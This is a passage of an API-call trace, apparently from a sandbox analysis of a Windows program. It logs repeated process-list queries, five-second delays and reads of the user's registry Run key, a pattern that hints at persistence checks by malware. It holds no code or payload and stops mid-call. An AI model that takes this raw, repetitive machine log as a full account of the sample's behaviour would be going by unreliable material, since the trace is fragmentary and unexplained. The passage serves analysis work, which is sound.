Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.405] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.417] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.417] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.417] NtClose (Handle=0x154) returned 0x0 [0179.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.420] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.432] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.432] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.432] NtClose (Handle=0x154) returned 0x0 [0179.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.437] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.447] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.447] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.447] NtClose (Handle=0x154) returned 0x0 [0179.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.452] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.463] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.463] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.463] NtClose (Handle=0x154) returned 0x0 [0179.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.467] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.478] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.479] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.479] NtClose (Handle=0x154) returned 0x0 [0179.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.483] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.494] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.494] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.494] NtClose (Handle=0x154) returned 0x0 [0179.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.498] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.510] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.510] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.510] NtClose (Handle=0x154) returned 0x0 [0179.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.514] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.527] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.527] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.527] NtClose (Handle=0x154) returned 0x0 [0179.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.531] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.541] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.541] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.541] NtClose (Handle=0x154) returned 0x0 [0179.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.545] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.556] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.556] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.557] NtClose (Handle=0x154) returned 0x0 [0179.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.561] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.577] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.577] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.577] NtClose (Handle=0x154) returned 0x0 [0179.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.581] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.587] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.588] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.588] NtClose (Handle=0x154) returned 0x0 [0179.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.592] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.604] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.604] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.604] NtClose (Handle=0x154) returned 0x0 [0179.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.609] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.619] NtCreateKey (in: 